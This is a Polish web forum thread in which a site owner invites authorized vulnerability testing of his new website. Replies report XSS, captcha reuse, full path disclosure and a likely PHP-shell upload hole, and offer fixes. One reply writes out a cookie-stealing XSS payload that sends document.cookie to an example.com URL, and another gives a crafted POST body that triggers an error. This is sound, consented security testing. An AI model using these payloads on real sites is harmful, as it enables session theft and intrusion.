Sprawdzenie podatności witryny na włamania

mTm

Użytkownik
Dołączył
Grudzień 25, 2009
Posty
10
Cześć,
Potrzebuję sprawdzenia podatności mojej witryny na włamania. W sieci jest od około 15 minut.
Zezwalam na próby włamań tylko do czasu zamknięcia tematu lub informacji o tym.
Adres: schoolnap.pl
Proszę zgłaszać wszystkie pomysły.
Dzięki
 

adiblol

Użytkownik
Dołączył
Kwiecień 24, 2009
Posty
49
Na SQL injection niewrażliwy bo włączone jest magic_quotes. Nie jest to zbyt eleganckie bo jak ktoś umieści cudzysłów to brzydko wygląda. Lepiej wyłączyć magic_quotes filtrować przed podaniem do SQLa.

WRAŻLIWOŚĆ NA ATAKI XSS!!! http://schoolnap.pl/index/1/11/9 popatrz w źródle co udało mi się umieścić. Teraz wyobraź sobie że umieszczam w załączonym skrypcie window.location.href='http://example.com/kradnij_ciastka/?'+document.cookie

Kod nieładny, skrypty poza <head>. Bleee...

BTW. Na jakim frameworku oparłeś ten serwis? A może chciało Ci się pisać od zera? ;)
 
Ostatnia edycja:

discovery44

Były Moderator
Dołączył
Sierpień 14, 2007
Posty
763
Podatność na wielokrotną rejestracje z tego samego captcha, FPD przy wysyłaniu POST'em pod adres http://schoolnap.pl/password:
name=asd&email[]=asd%40asd.com&birthday=11-11-1111&captcha=6m52ra&submit=Przypomnij
Nie sprawdzałem innych miejsc pod kątem FPD, pokazałem tylko jakie są błędy.

Phpshella też można wgrać :)
/profile/edit też by się przydało zablokować dopóki nie zabezpieczysz przed wgrywaniem dowolnych plików bo prawdopodobnie można wgrać phpshella (nie chcę się cackać z tym teraz ale pliki php można przesyłać). Sprawdzasz nazwę pliku i format w nazwie a musisz jeszcze sprawdzać typ pliku - LHH w FF i po herbacie masz. I tu masz znowu FPD.

Reszty nie chciało mi się szukać, jeżeli chcesz żeby ktoś to zrobił dokładnie to daj kody źródłowe do sprawdzenia, mi nie chce się szukać igły w stogu siana. Jak sypniesz kasą to możesz mi to zlecić (PW) albo daj tutaj kod tylko licz się z tym, że jeżeli ktoś znajdzie dziurę to może zostawić sobie lukę "na później".

// A - no i oczywiście XSS w nicku, XSS'ów masz od groma :) poddaj wszystkie zmienne filtracji
 
Ostatnia edycja:

mTm

Użytkownik
Dołączył
Grudzień 25, 2009
Posty
10
To strona od zera. Żadnego zewnętrznego skryptu (no jQuery i captcha).

Dobra, trochę zmieniłem. Próbujcie teraz.
Już teraz duże dzięki dla: discovery44, adiblol i kilku innych osób, które znam niestety tylko po IP.

Nieaktywne konta usunąłem.
 
Ostatnia edycja:

Vandervir

Były Administrator
Dołączył
Grudzień 19, 2005
Posty
474
Przecież ta strona to html nie ma co atakować.
Jedynie właściciel strony może być podatny na socjotechnikę, skoro podał linki do portali społecznościowych.
 
Do góry Bottom